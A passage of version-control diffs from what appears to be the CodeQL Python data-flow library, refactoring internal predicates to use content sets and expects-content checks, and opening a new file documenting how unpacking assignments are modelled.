)
or
@@ -732,10 +790,10 @@ private module Stage1 {
*/
pragma[nomagic]
private predicate revFlowConsCand(Content c, Configuration config) {
exists(NodeEx mid, NodeEx node |
exists(NodeEx mid, NodeEx node, ContentSet cs |
fwdFlow(node, pragma[only_bind_into](config)) and
read(node, c, mid, config) and
fwdFlowConsCand(c, pragma[only_bind_into](config)) and
readSet(node, cs, mid, config) and
fwdFlowConsCandSet(cs, c, pragma[only_bind_into](config)) and
revFlow(pragma[only_bind_into](mid), _, pragma[only_bind_into](config))
)
}
@@ -754,7 +812,8 @@ private module Stage1 {
* Holds if `c` is the target of both a read and a store in the flow covered
* by `revFlow`.
*/
private predicate revFlowIsReadAndStored(Content c, Configuration conf) {
pragma[nomagic]
predicate revFlowIsReadAndStored(Content c, Configuration conf) {
revFlowConsCand(c, conf) and
revFlowStore(c, _, _, conf)
}
@@ -853,8 +912,8 @@ private module Stage1 {
pragma[nomagic]
predicate readStepCand(NodeEx n1, Content c, NodeEx n2, Configuration config) {
revFlowIsReadAndStored(c, pragma[only_bind_into](config)) and
revFlow(n2, pragma[only_bind_into](config)) and
read(n1, c, n2, pragma[only_bind_into](config))
read(n1, c, n2, pragma[only_bind_into](config)) and
revFlow(n2, pragma[only_bind_into](config))
}
pragma[nomagic]
@@ -864,7 +923,10 @@ private module Stage1 {
predicate revFlow(
NodeEx node, FlowState state, boolean toReturn, ApOption returnAp, Ap ap, Configuration config
) {
revFlow(node, toReturn, config) and exists(state) and exists(returnAp) and exists(ap)
revFlow(node, toReturn, pragma[only_bind_into](config)) and
exists(state) and
exists(returnAp) and
exists(ap)
}
private predicate throughFlowNodeCand(NodeEx node, Configuration config) {
@@ -1110,8 +1172,8 @@ private module Stage2 {
if reducedViableImplInReturn(c, call) then result = TReturn(c, call) else result = ccNone()
}
bindingset[node, cc, config]
private LocalCc getLocalCc(NodeEx node, Cc cc, Configuration config) { any() }
bindingset[node, cc]
private LocalCc getLocalCc(NodeEx node, Cc cc) { any() }
bindingset[node1, state1, config]
bindingset[node2, state2, config]
@@ -1139,11 +1201,26 @@ private module Stage2 {
private predicate flowIntoCall = flowIntoCallNodeCand1/5;
pragma[nomagic]
private predicate expectsContentCand(NodeEx node, Configuration config) {
exists(Content c |
PrevStage::revFlow(node, pragma[only_bind_into](config)) and
PrevStage::revFlowIsReadAndStored(c, pragma[only_bind_into](config)) and
expectsContentEx(node, c)
)
}
bindingset[node, state, ap, config]
private predicate filter(NodeEx node, FlowState state, Ap ap, Configuration config) {
PrevStage::revFlowState(state, config) and
PrevStage::revFlowState(state, pragma[only_bind_into](config)) and
exists(ap) and
not stateBarrier(node, state, config)
not stateBarrier(node, state, config) and
(
notExpectsContent(node)
or
ap = true and
expectsContentCand(node, config)
)
}
bindingset[ap, contentType]
@@ -1198,7 +1275,7 @@ private module Stage2 {
or
exists(NodeEx mid, FlowState state0, Ap ap0, LocalCc localCc |
fwdFlow(mid, state0, cc, argAp, ap0, config) and
localCc = getLocalCc(mid, cc, config)
localCc = getLocalCc(mid, cc)
|
localStep(mid, state0, node, state, true, _, config, localCc) and
ap = ap0
@@ -1566,7 +1643,7 @@ private module Stage2 {
Configuration config
) {
exists(Ap ap2, Content c |
store(node1, tc, node2, contentType, config) and
PrevStage::storeStepCand(node1, _, tc, node2, contentType, config) and
revFlowStore(ap2, c, ap1, node1, _, tc, node2, _, _, config) and
revFlowConsCand(ap2, c, ap1, config)
)
@@ -1604,10 +1681,24 @@ private module Stage2 {
storeStepFwd(_, ap, tc, _, _, config)
}
predicate consCand(TypedContent tc, Ap ap, Configuration config) {
private predicate revConsCand(TypedContent tc, Ap ap, Configuration config) {
storeStepCand(_, ap, tc, _, _, config)
}
private predicate validAp(Ap ap, Configuration config) {
revFlow(_, _, _, _, ap, config) and ap instanceof ApNil
or
exists(TypedContent head, Ap tail |
consCand(head, tail, config) and
ap = apCons(head, tail)
)
}
predicate consCand(TypedContent tc, Ap ap, Configuration config) {
revConsCand(tc, ap, config) and
validAp(ap, config)
}
pragma[noinline]
private predicate parameterFlow(
ParamNodeEx p, Ap ap, Ap ap0, DataFlowCallable c, Configuration config
@@ -1698,7 +1789,8 @@ private module LocalFlowBigStep {
private class FlowCheckNode extends NodeEx {
FlowCheckNode() {
castNode(this.asNode()) or
clearsContentCached(this.asNode(), _)
clearsContentCached(this.asNode(), _) or
expectsContentCached(this.asNode(), _)
}
}
@@ -1706,18 +1798,31 @@ private module LocalFlowBigStep {
* Holds if `node` can be the first node in a maximal subsequence of local
* flow steps in a dataflow path.
*/
predicate localFlowEntry(NodeEx node, FlowState state, Configuration config) {
private predicate localFlowEntry(NodeEx node, FlowState state, Configuration config) {
Stage2::revFlow(node, state, config) and
(
sourceNode(node, state, config) or
jumpStep(_, node, config) or
additionalJumpStep(_, node, config) or
additionalJumpStateStep(_, _, node, state, config) or
node instanceof ParamNodeEx or
node.asNode() instanceof OutNodeExt or
store(_, _, node, _, config) or
read(_, _, node, config) or
sourceNode(node, state, config)
or
jumpStep(_, node, config)
or
additionalJumpStep(_, node, config)
or
additionalJumpStateStep(_, _, node, state, config)
or
node instanceof ParamNodeEx
or
node.asNode() instanceof OutNodeExt
or
Stage2::storeStepCand(_, _, _, node, _, config)
or
Stage2::readStepCand(_, _, node, config)
or
node instanceof FlowCheckNode
or
exists(FlowState s |
additionalLocalStateStep(_, s, node, state, config) and
s != state
)
)
}
@@ -1731,12 +1836,15 @@ private module LocalFlowBigStep {
additionalJumpStep(node, next, config) or
flowIntoCallNodeCand1(_, node, next, config) or
flowOutOfCallNodeCand1(_, node, next, config) or
store(node, _, next, _, config) or
read(node, _, next, config)
Stage2::storeStepCand(node, _, _, next, _, config) or
Stage2::readStepCand(node, _, next, config)
)
or
exists(NodeEx next, FlowState s | Stage2::revFlow(next, s, config) |
additionalJumpStateStep(node, state, next, s, config)
or
additionalLocalStateStep(node, state, next, s, config) and
s != state
)
or
Stage2::revFlow(node, state, config) and
@@ -1770,42 +1878,40 @@ private module LocalFlowBigStep {
*/
pragma[nomagic]
private predicate localFlowStepPlus(
NodeEx node1, FlowState state1, NodeEx node2, FlowState state2, boolean preservesValue,
DataFlowType t, Configuration config, LocalCallContext cc
NodeEx node1, FlowState state, NodeEx node2, boolean preservesValue, DataFlowType t,
Configuration config, LocalCallContext cc
) {
not isUnreachableInCallCached(node2.asNode(), cc.(LocalCallContextSpecificCall).getCall()) and
(
localFlowEntry(node1, pragma[only_bind_into](state1), pragma[only_bind_into](config)) and
localFlowEntry(node1, pragma[only_bind_into](state), pragma[only_bind_into](config)) and
(
localFlowStepNodeCand1(node1, node2, config) and
state1 = state2 and
preservesValue = true and
t = node1.getDataFlowType() // irrelevant dummy value
t = node1.getDataFlowType() and // irrelevant dummy value
Stage2::revFlow(node2, pragma[only_bind_into](state), pragma[only_bind_into](config))
or
additionalLocalFlowStepNodeCand2(node1, state1, node2, state2, config) and
additionalLocalFlowStepNodeCand2(node1, state, node2, state, config) and
preservesValue = false and
t = node2.getDataFlowType()
) and
node1 != node2 and
cc.relevantFor(node1.getEnclosingCallable()) and
not isUnreachableInCallCached(node1.asNode(), cc.(LocalCallContextSpecificCall).getCall()) and
Stage2::revFlow(node2, pragma[only_bind_into](state2), pragma[only_bind_into](config))
not isUnreachableInCallCached(node1.asNode(), cc.(LocalCallContextSpecificCall).getCall())
or
exists(NodeEx mid |
localFlowStepPlus(node1, state1, mid, pragma[only_bind_into](state2), preservesValue, t,
localFlowStepPlus(node1, pragma[only_bind_into](state), mid, preservesValue, t,
pragma[only_bind_into](config), cc) and
localFlowStepNodeCand1(mid, node2, config) and
not mid instanceof FlowCheckNode and
Stage2::revFlow(node2, pragma[only_bind_into](state2), pragma[only_bind_into](config))
Stage2::revFlow(node2, pragma[only_bind_into](state), pragma[only_bind_into](config))
)
or
exists(NodeEx mid, FlowState st |
localFlowStepPlus(node1, state1, mid, st, _, _, pragma[only_bind_into](config), cc) and
additionalLocalFlowStepNodeCand2(mid, st, node2, state2, config) and
exists(NodeEx mid |
localFlowStepPlus(node1, state, mid, _, _, pragma[only_bind_into](config), cc) and
additionalLocalFlowStepNodeCand2(mid, state, node2, state, config) and
not mid instanceof FlowCheckNode and
preservesValue = false and
t = node2.getDataFlowType() and
Stage2::revFlow(node2, state2, pragma[only_bind_into](config))
t = node2.getDataFlowType()
)
)
}
@@ -1819,9 +1925,19 @@ private module LocalFlowBigStep {
NodeEx node1, FlowState state1, NodeEx node2, FlowState state2, boolean preservesValue,
AccessPathFrontNil apf, Configuration config, LocalCallContext callContext
) {
localFlowStepPlus(node1, state1, node2, state2, preservesValue, apf.getType(), config,
callContext) and
localFlowExit(node2, state2, config)
localFlowStepPlus(node1, state1, node2, preservesValue, apf.getType(), config, callContext) and
localFlowExit(node2, state1, config) and
state1 = state2
or
additionalLocalFlowStepNodeCand2(node1, state1, node2, state2, config) and
state1 != state2 and
preservesValue = false and
apf = TFrontNil(node2.getDataFlowType()) and
callContext.relevantFor(node1.getEnclosingCallable()) and
not exists(DataFlowCall call | call = callContext.(LocalCallContextSpecificCall).getCall() |
isUnreachableInCallCached(node1.asNode(), call) or
isUnreachableInCallCached(node2.asNode(), call)
)
}
}
@@ -1879,8 +1995,8 @@ private module Stage3 {
bindingset[call, c, innercc]
private CcNoCall getCallContextReturn(DataFlowCallable c, DataFlowCall call, Cc innercc) { any() }
bindingset[node, cc, config]
private LocalCc getLocalCc(NodeEx node, Cc cc, Configuration config) { any() }
bindingset[node, cc]
private LocalCc getLocalCc(NodeEx node, Cc cc) { any() }
private predicate localStep(
NodeEx node1, FlowState state1, NodeEx node2, FlowState state2, boolean preservesValue,
@@ -1894,7 +2010,34 @@ private module Stage3 {
private predicate flowIntoCall = flowIntoCallNodeCand2/5;
pragma[nomagic]
private predicate clear(NodeEx node, Ap ap) { ap.isClearedAt(node.asNode()) }
private predicate clearSet(NodeEx node, ContentSet c, Configuration config) {
PrevStage::revFlow(node, config) and
clearsContentCached(node.asNode(), c)
}
pragma[nomagic]
private predicate clearContent(NodeEx node, Content c, Configuration config) {
exists(ContentSet cs |
PrevStage::readStepCand(_, pragma[only_bind_into](c), _, pragma[only_bind_into](config)) and
c = cs.getAReadContent() and
clearSet(node, cs, pragma[only_bind_into](config))
)
}
pragma[nomagic]
private predicate clear(NodeEx node, Ap ap, Configuration config) {
clearContent(node, ap.getHead().getContent(), config)
}
pragma[nomagic]
private predicate expectsContentCand(NodeEx node, Ap ap, Configuration config) {
exists(Content c |
PrevStage::revFlow(node, pragma[only_bind_into](config)) and
PrevStage::readStepCand(_, c, _, pragma[only_bind_into](config)) and
expectsContentEx(node, c) and
c = ap.getHead().getContent()
)
}
pragma[nomagic]
private predicate castingNodeEx(NodeEx node) { node.asNode() instanceof CastingNode }
@@ -1903,8 +2046,13 @@ private module Stage3 {
private predicate filter(NodeEx node, FlowState state, Ap ap, Configuration config) {
exists(state) and
exists(config) and
not clear(node, ap) and
if castingNodeEx(node) then compatibleTypes(node.getDataFlowType(), ap.getType()) else any()
not clear(node, ap, config) and
(if castingNodeEx(node) then compatibleTypes(node.getDataFlowType(), ap.getType()) else any()) and
(
notExpectsContent(node)
or
expectsContentCand(node, ap, config)
)
}
bindingset[ap, contentType]
@@ -1963,7 +2111,7 @@ private module Stage3 {
or
exists(NodeEx mid, FlowState state0, Ap ap0, LocalCc localCc |
fwdFlow(mid, state0, cc, argAp, ap0, config) and
localCc = getLocalCc(mid, cc, config)
localCc = getLocalCc(mid, cc)
|
localStep(mid, state0, node, state, true, _, config, localCc) and
ap = ap0
@@ -2331,7 +2479,7 @@ private module Stage3 {
Configuration config
) {
exists(Ap ap2, Content c |
store(node1, tc, node2, contentType, config) and
PrevStage::storeStepCand(node1, _, tc, node2, contentType, config) and
revFlowStore(ap2, c, ap1, node1, _, tc, node2, _, _, config) and
revFlowConsCand(ap2, c, ap1, config)
)
@@ -2369,10 +2517,24 @@ private module Stage3 {
storeStepFwd(_, ap, tc, _, _, config)
}
predicate consCand(TypedContent tc, Ap ap, Configuration config) {
private predicate revConsCand(TypedContent tc, Ap ap, Configuration config) {
storeStepCand(_, ap, tc, _, _, config)
}
private predicate validAp(Ap ap, Configuration config) {
revFlow(_, _, _, _, ap, config) and ap instanceof ApNil
or
exists(TypedContent head, Ap tail |
consCand(head, tail, config) and
ap = apCons(head, tail)
)
}
predicate consCand(TypedContent tc, Ap ap, Configuration config) {
revConsCand(tc, ap, config) and
validAp(ap, config)
}
pragma[noinline]
private predicate parameterFlow(
ParamNodeEx p, Ap ap, Ap ap0, DataFlowCallable c, Configuration config
@@ -2693,9 +2855,8 @@ private module Stage4 {
if reducedViableImplInReturn(c, call) then result = TReturn(c, call) else result = ccNone()
}
bindingset[node, cc, config]
private LocalCc getLocalCc(NodeEx node, Cc cc, Configuration config) {
localFlowEntry(node, _, config) and
bindingset[node, cc]
private LocalCc getLocalCc(NodeEx node, Cc cc) {
result =
getLocalCallContext(pragma[only_bind_into](pragma[only_bind_out](cc)),
node.getEnclosingCallable())
@@ -2791,7 +2952,7 @@ private module Stage4 {
or
exists(NodeEx mid, FlowState state0, Ap ap0, LocalCc localCc |
fwdFlow(mid, state0, cc, argAp, ap0, config) and
localCc = getLocalCc(mid, cc, config)
localCc = getLocalCc(mid, cc)
|
localStep(mid, state0, node, state, true, _, config, localCc) and
ap = ap0
@@ -3159,7 +3320,7 @@ private module Stage4 {
Configuration config
) {
exists(Ap ap2, Content c |
store(node1, tc, node2, contentType, config) and
PrevStage::storeStepCand(node1, _, tc, node2, contentType, config) and
revFlowStore(ap2, c, ap1, node1, _, tc, node2, _, _, config) and
revFlowConsCand(ap2, c, ap1, config)
)
@@ -3197,10 +3358,24 @@ private module Stage4 {
storeStepFwd(_, ap, tc, _, _, config)
}
predicate consCand(TypedContent tc, Ap ap, Configuration config) {
private predicate revConsCand(TypedContent tc, Ap ap, Configuration config) {
storeStepCand(_, ap, tc, _, _, config)
}
private predicate validAp(Ap ap, Configuration config) {
revFlow(_, _, _, _, ap, config) and ap instanceof ApNil
or
exists(TypedContent head, Ap tail |
consCand(head, tail, config) and
ap = apCons(head, tail)
)
}
predicate consCand(TypedContent tc, Ap ap, Configuration config) {
revConsCand(tc, ap, config) and
validAp(ap, config)
}
pragma[noinline]
private predicate parameterFlow(
ParamNodeEx p, Ap ap, Ap ap0, DataFlowCallable c, Configuration config
@@ -3269,17 +3444,28 @@ private Configuration unbindConf(Configuration conf) {
exists(Configuration c | result = pragma[only_bind_into](c) and conf = pragma[only_bind_into](c))
}
private predicate nodeMayUseSummary(
NodeEx n, FlowState state, AccessPathApprox apa, Configuration config
pragma[nomagic]
private predicate nodeMayUseSummary0(
NodeEx n, DataFlowCallable c, FlowState state, AccessPathApprox apa, Configuration config
) {
exists(DataFlowCallable c, AccessPathApprox apa0 |
Stage4::parameterMayFlowThrough(_, c, apa, _) and
exists(AccessPathApprox apa0 |
Stage4::parameterMayFlowThrough(_, c, _, _) and
Stage4::revFlow(n, state, true, _, apa0, config) and
Stage4::fwdFlow(n, state, any(CallContextCall ccc), TAccessPathApproxSome(apa), apa0, config) and
n.getEnclosingCallable() = c
)
}
pragma[nomagic]
private predicate nodeMayUseSummary(
NodeEx n, FlowState state, AccessPathApprox apa, Configuration config
) {
exists(DataFlowCallable c |
Stage4::parameterMayFlowThrough(_, c, apa, config) and
nodeMayUseSummary0(n, c, state, apa, config)
)
}
private newtype TSummaryCtx =
TSummaryCtxNone() or
TSummaryCtxSome(ParamNodeEx p, FlowState state, AccessPath ap) {
@@ -3475,7 +3661,7 @@ private newtype TPathNode =
* of dereference operations needed to get from the value in the node to the
* tracked object. The final type indicates the type of the tracked object.
*/
abstract private class AccessPath extends TAccessPath {
private class AccessPath extends TAccessPath {
/** Gets the head of this access path, if any. */
abstract TypedContent getHead();
@@ -3690,11 +3876,14 @@ abstract private class PathNodeImpl extends PathNode {
abstract NodeEx getNodeEx();
predicate isHidden() {
hiddenNode(this.getNodeEx().asNode()) and
not this.isSource() and
not this instanceof PathNodeSink
or
this.getNodeEx() instanceof TNodeImplicitRead
not this.getConfiguration().includeHiddenNodes() and
(
hiddenNode(this.getNodeEx().asNode()) and
not this.isSource() and
not this instanceof PathNodeSink
or
this.getNodeEx() instanceof TNodeImplicitRead
)
}
private string ppAp() {
@@ -4171,10 +4360,16 @@ private module Subpaths {
exists(NodeEx n1, NodeEx n2 | n1 = n.getNodeEx() and n2 = result.getNodeEx() |
localFlowBigStep(n1, _, n2, _, _, _, _, _) or
store(n1, _, n2, _, _) or
read(n1, _, n2, _)
readSet(n1, _, n2, _)
)
}
pragma[nomagic]
private predicate hasSuccessor(PathNode pred, PathNodeMid succ, NodeEx succNode) {
succ = pred.getASuccessor() and
succNode = succ.getNodeEx()
}
/**
* Holds if `(arg, par, ret, out)` forms a subpath-tuple, that is, flow through
* a subpath between `par` and `ret` with the connecting edges `arg -> par` and
@@ -4182,15 +4377,13 @@ private module Subpaths {
*/
predicate subpaths(PathNode arg, PathNodeImpl par, PathNodeImpl ret, PathNode out) {
exists(ParamNodeEx p, NodeEx o, FlowState sout, AccessPath apout, PathNodeMid out0 |
pragma[only_bind_into](arg).getASuccessor() = par and
pragma[only_bind_into](arg).getASuccessor() = out0 and
subpaths03(arg, p, localStepToHidden*(ret), o, sout, apout) and
pragma[only_bind_into](arg).getASuccessor() = pragma[only_bind_into](out0) and
subpaths03(pragma[only_bind_into](arg), p, localStepToHidden*(ret), o, sout, apout) and
hasSuccessor(pragma[only_bind_into](arg), par, p) and
not ret.isHidden() and
par.getNodeEx() = p and
out0.getNodeEx() = o and
out0.getState() = sout and
out0.getAp() = apout and
(out = out0 or out = out0.projectToSink())
pathNode(out0, o, sout, _, _, apout, _, _)
|
out = out0 or out = out0.projectToSink()
)
}
@@ -4526,7 +4719,11 @@ private module FlowExploration {
or
exists(PartialPathNodeRev mid |
revPartialPathStep(mid, node, state, sc1, sc2, sc3, ap, config) and
not clearsContentCached(node.asNode(), ap.getHead()) and
not clearsContentEx(node, ap.getHead()) and
(
notExpectsContent(node) or
expectsContentEx(node, ap.getHead())
) and
not fullBarrier(node, config) and
not stateBarrier(node, state, config) and
distSink(node.getEnclosingCallable(), config) <= config.explorationLimit()
@@ -4542,7 +4739,11 @@ private module FlowExploration {
partialPathStep(mid, node, state, cc, sc1, sc2, sc3, ap, config) and
not fullBarrier(node, config) and
not stateBarrier(node, state, config) and
not clearsContentCached(node.asNode(), ap.getHead().getContent()) and
not clearsContentEx(node, ap.getHead().getContent()) and
(
notExpectsContent(node) or
expectsContentEx(node, ap.getHead().getContent())
) and
if node.asNode() instanceof CastingNode
then compatibleTypes(node.getDataFlowType(), ap.getType())
else any()
@@ -4976,6 +5177,7 @@ private module FlowExploration {
)
}
pragma[nomagic]
private predicate revPartialPathStep(
PartialPathNodeRev mid, NodeEx node, FlowState state, TRevSummaryCtx1 sc1, TRevSummaryCtx2 sc2,
TRevSummaryCtx3 sc3, RevPartialAccessPath ap, Configuration config

View File

@@ -216,10 +216,9 @@ private module LambdaFlow {
or
// jump step
exists(Node mid, DataFlowType t0 |
revLambdaFlow(lambdaCall, kind, mid, t0, _, _, _) and
revLambdaFlow(lambdaCall, kind, mid, t0, _, _, lastCall) and
toReturn = false and
toJump = true and
lastCall = TDataFlowCallNone()
toJump = true
|
jumpStepCached(node, mid) and
t = t0
@@ -305,7 +304,7 @@ cached
private module Cached {
/**
* If needed, call this predicate from `DataFlowImplSpecific.qll` in order to
* force a stage-dependency on the `DataFlowImplCommon.qll` stage and therby
* force a stage-dependency on the `DataFlowImplCommon.qll` stage and thereby
* collapsing the two stages.
*/
cached
@@ -326,7 +325,10 @@ private module Cached {
predicate jumpStepCached(Node node1, Node node2) { jumpStep(node1, node2) }
cached
predicate clearsContentCached(Node n, Content c) { clearsContent(n, c) }
predicate clearsContentCached(Node n, ContentSet c) { clearsContent(n, c) }
cached
predicate expectsContentCached(Node n, ContentSet c) { expectsContent(n, c) }
cached
predicate isUnreachableInCallCached(Node n, DataFlowCall call) { isUnreachableInCall(n, call) }
@@ -373,7 +375,7 @@ private module Cached {
// For reads, `x.f`, we want to check that the tracked type after the read (which
// is obtained by popping the head of the access path stack) is compatible with
// the type of `x.f`.
read(_, _, n)
readSet(_, _, n)
}
cached
@@ -469,7 +471,7 @@ private module Cached {
// read
exists(Node mid |
parameterValueFlowCand(p, mid, false) and
read(mid, _, node) and
readSet(mid, _, node) and
read = true
)
or
@@ -657,8 +659,10 @@ private module Cached {
* Holds if `arg` flows to `out` through a call using only
* value-preserving steps and a single read step, not taking call
* contexts into account, thus representing a getter-step.
*
* This predicate is exposed for testing only.
*/
predicate getterStep(ArgNode arg, Content c, Node out) {
predicate getterStep(ArgNode arg, ContentSet c, Node out) {
argumentValueFlowsThrough(arg, TReadStepTypesSome(_, c, _), out)
}
@@ -781,8 +785,12 @@ private module Cached {
parameterValueFlow(p, n.getPreUpdateNode(), TReadStepTypesNone())
}
private predicate store(
Node node1, Content c, Node node2, DataFlowType contentType, DataFlowType containerType
cached
predicate readSet(Node node1, ContentSet c, Node node2) { readStep(node1, c, node2) }
cached
predicate storeSet(
Node node1, ContentSet c, Node node2, DataFlowType contentType, DataFlowType containerType
) {
storeStep(node1, c, node2) and
contentType = getNodeDataFlowType(node1) and
@@ -794,14 +802,19 @@ private module Cached {
|
argumentValueFlowsThrough(n2, TReadStepTypesSome(containerType, c, contentType), n1)
or
read(n2, c, n1) and
readSet(n2, c, n1) and
contentType = getNodeDataFlowType(n1) and
containerType = getNodeDataFlowType(n2)
)
}
cached
predicate read(Node node1, Content c, Node node2) { readStep(node1, c, node2) }
private predicate store(
Node node1, Content c, Node node2, DataFlowType contentType, DataFlowType containerType
) {
exists(ContentSet cs |
c = cs.getAStoreContent() and storeSet(node1, cs, node2, contentType, containerType)
)
}
/**
* Holds if data can flow from `node1` to `node2` via a direct assignment to
@@ -932,16 +945,16 @@ class CastingNode extends Node {
}
private predicate readStepWithTypes(
Node n1, DataFlowType container, Content c, Node n2, DataFlowType content
Node n1, DataFlowType container, ContentSet c, Node n2, DataFlowType content
) {
read(n1, c, n2) and
readSet(n1, c, n2) and
container = getNodeDataFlowType(n1) and
content = getNodeDataFlowType(n2)
}
private newtype TReadStepTypesOption =
TReadStepTypesNone() or
TReadStepTypesSome(DataFlowType container, Content c, DataFlowType content) {
TReadStepTypesSome(DataFlowType container, ContentSet c, DataFlowType content) {
readStepWithTypes(_, container, c, _, content)
}
@@ -950,7 +963,7 @@ private class ReadStepTypesOption extends TReadStepTypesOption {
DataFlowType getContainerType() { this = TReadStepTypesSome(result, _, _) }
Content getContent() { this = TReadStepTypesSome(_, result, _) }
ContentSet getContent() { this = TReadStepTypesSome(_, result, _) }
DataFlowType getContentType() { this = TReadStepTypesSome(_, _, result) }
@@ -1325,8 +1338,6 @@ abstract class AccessPathFront extends TAccessPathFront {
abstract boolean toBoolNonEmpty();
TypedContent getHead() { this = TFrontHead(result) }
predicate isClearedAt(Node n) { clearsContentCached(n, this.getHead().getContent()) }
}
class AccessPathFrontNil extends AccessPathFront, TFrontNil {

View File

@@ -1,9 +1,15 @@
/**
* Provides Python-specific definitions for use in the data flow library.
*/
// we need to export `Unit` for the DataFlowImpl* files
private import python as Python
module Private {
import DataFlowPrivate
// import DataFlowDispatch
class Unit = Python::Unit;
}
module Public {

View File

@@ -87,7 +87,20 @@ newtype TNode =
/**
* A synthetic node representing element content in a star pattern.
*/
TStarPatternElementNode(MatchStarPattern target)
TStarPatternElementNode(MatchStarPattern target) or
/**
* INTERNAL: Do not use.
*
* A synthetic node representing the data for an ORM model saved in a DB.
*/
// TODO: Limiting the classes here to the ones that are actually ORM models was
// non-trivial, since that logic is based on API::Node results, and trying to do this
// causes non-monotonic recursion, and makes the API graph evaluation recursive with
// data-flow, which might do bad things for performance.
//
// So for now we live with having these synthetic ORM nodes for _all_ classes, which
// is a bit wasteful, but we don't think it will hurt too much.
TSyntheticOrmModelNode(Class cls)
/** Helper for `Node::getEnclosingCallable`. */
private DataFlowCallable getCallableScope(Scope s) {
@@ -97,13 +110,19 @@ private DataFlowCallable getCallableScope(Scope s) {
result = getCallableScope(s.getEnclosingScope())
}
private import semmle.python.internal.CachedStages
/**
* An element, viewed as a node in a data flow graph. Either an SSA variable
* (`EssaNode`) or a control flow node (`CfgNode`).
*/
class Node extends TNode {
/** Gets a textual representation of this element. */
string toString() { result = "Data flow node" }
cached
string toString() {
Stages::DataFlow::ref() and
result = "Data flow node"
}
/** Gets the scope of this node. */
Scope getScope() { none() }
@@ -121,9 +140,11 @@ class Node extends TNode {
* For more information, see
* [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/).
*/
cached
predicate hasLocationInfo(
string filepath, int startline, int startcolumn, int endline, int endcolumn
) {
Stages::DataFlow::ref() and
this.getLocation().hasLocationInfo(filepath, startline, startcolumn, endline, endcolumn)
}
@@ -190,7 +211,7 @@ class CallCfgNode extends CfgNode, LocalSourceNode {
*/
Node getFunction() { result.asCfgNode() = node.getFunction() }
/** Gets the data-flow node corresponding to the i'th argument of the call corresponding to this data-flow node */
/** Gets the data-flow node corresponding to the i'th positional argument of the call corresponding to this data-flow node */
Node getArg(int i) { result.asCfgNode() = node.getArg(i) }
/** Gets the data-flow node corresponding to the named argument of the call corresponding to this data-flow node */
@@ -380,8 +401,15 @@ class ModuleVariableNode extends Node, TModuleVariableNode {
private predicate isAccessedThroughImportStar(Module m) { m = ImportStar::getStarImported(_) }
private ModuleVariableNode import_star_read(Node n) {
ImportStar::importStarResolvesTo(n.asCfgNode(), result.getModule()) and
n.asCfgNode().(NameNode).getId() = result.getVariable().getId()
resolved_import_star_module(result.getModule(), result.getVariable().getId(), n)
}
pragma[nomagic]
private predicate resolved_import_star_module(Module m, string name, Node n) {
exists(NameNode nn | nn = n.asCfgNode() |
ImportStar::importStarResolvesTo(pragma[only_bind_into](nn), m) and
nn.getId() = name
)
}
/**
@@ -622,3 +650,20 @@ class AttributeContent extends TAttributeContent, Content {
override string toString() { result = "Attribute " + attr }
}
/**
* An entity that represents a set of `Content`s.
*
* The set may be interpreted differently depending on whether it is
* stored into (`getAStoreContent`) or read from (`getAReadContent`).
*/
class ContentSet instanceof Content {
/** Gets a content that may be stored into when storing into this set. */
Content getAStoreContent() { result = this }
/** Gets a content that may be read from when reading from this set. */
Content getAReadContent() { result = this }
/** Gets a textual representation of this content set. */
string toString() { result = super.toString() }
}

View File

@@ -2,6 +2,7 @@
* Contains utility functions for writing data flow queries
*/
private import python
private import DataFlowPrivate
import DataFlowPublic

View File

@@ -0,0 +1,396 @@
/**
* The unpacking assignment takes the general form
* ```python
* sequence = iterable
* ```
* where `sequence` is either a tuple or a list and it can contain wildcards.
* The iterable can be any iterable, which means that (CodeQL modeling of) content
* will need to change type if it should be transferred from the LHS to the RHS.
*
* Note that (CodeQL modeling of) content does not have to change type on data-flow
* paths _inside_ the LHS, as the different allowed syntaxes here are merely a convenience.
* Consequently, we model all LHS sequences as tuples, which have the more precise content
* model, making flow to the elements more precise. If an element is a starred variable,
* we will have to mutate the content type to be list content.
*
* We may for instance have
* ```python
* (a, b) = ["a", SOURCE] # RHS has content `ListElementContent`
* ```
* Due to the abstraction for list content, we do not know whether `SOURCE`
* ends up in `a` or in `b`, so we want to overapproximate and see it in both.
*
* Using wildcards we may have
* ```python
* (a, *b) = ("a", "b", SOURCE) # RHS has content `TupleElementContent(2)`
* ```
* Since the starred variables are always assigned (Python-)type list, `*b` will be
* `["b", SOURCE]`, and we will again overapproximate and assign it
* content corresponding to anything found in the RHS.
*
* For a precise transfer
* ```python
* (a, b) = ("a", SOURCE) # RHS has content `TupleElementContent(1)`
* ```
* we wish to keep the precision, so only `b` receives the tuple content at index 1.
*
* Finally, `sequence` is actually a pattern and can have a more complicated structure,
* such as
* ```python
* (a, [b, *c]) = ("a", ["b", SOURCE]) # RHS has content `TupleElementContent(1); ListElementContent`
* ```
* where `a` should not receive content, but `b` and `c` should. `c` will be `[SOURCE]` so
* should have the content transferred, while `b` should read it.
*
* To transfer content from RHS to the elements of the LHS in the expression `sequence = iterable`,
* we use two synthetic nodes:
*
* - `TIterableSequence(sequence)` which captures the content-modeling the entire `sequence` will have
* (essentially just a copy of the content-modeling the RHS has)
*
* - `TIterableElement(sequence)` which captures the content-modeling that will be assigned to an element.
* Note that an empty access path means that the value we are tracking flows directly to the element.
*
*
 * The `TIterableSequence(sequence)` is at this point superfluous but becomes useful when handling recursive
* structures in the LHS, where `sequence` is some internal sequence node. We can have a uniform treatment
* by always having these two synthetic nodes. So we transfer to (or, in the recursive case, read into)
* `TIterableSequence(sequence)`, from which we take a read step to `TIterableElement(sequence)` and then a
* store step to `sequence`.
*
* This allows the unknown content from the RHS to be read into `TIterableElement(sequence)` and tuple content
 * to then be stored into `sequence`. If the content is already tuple content, this indirection creates crosstalk
* between indices. Therefore, tuple content is never read into `TIterableElement(sequence)`; it is instead
* transferred directly from `TIterableSequence(sequence)` to `sequence` via a flow step. Such a flow step will
* also transfer other content, but only tuple content is further read from `sequence` into its elements.
*
* The strategy is then via several read-, store-, and flow steps:
* 1. a) [Flow] Content is transferred from `iterable` to `TIterableSequence(sequence)` via a
* flow step. From here, everything happens on the LHS.
*
* b) [Read] If the unpacking happens inside a for as in
* ```python
* for sequence in iterable
* ```
* then content is read from `iterable` to `TIterableSequence(sequence)`.
*
* 2. [Flow] Content is transferred from `TIterableSequence(sequence)` to `sequence` via a
* flow step. (Here only tuple content is relevant.)
*
* 3. [Read] Content is read from `TIterableSequence(sequence)` into `TIterableElement(sequence)`.
* As `sequence` is modeled as a tuple, we will not read tuple content as that would allow
* crosstalk.
*
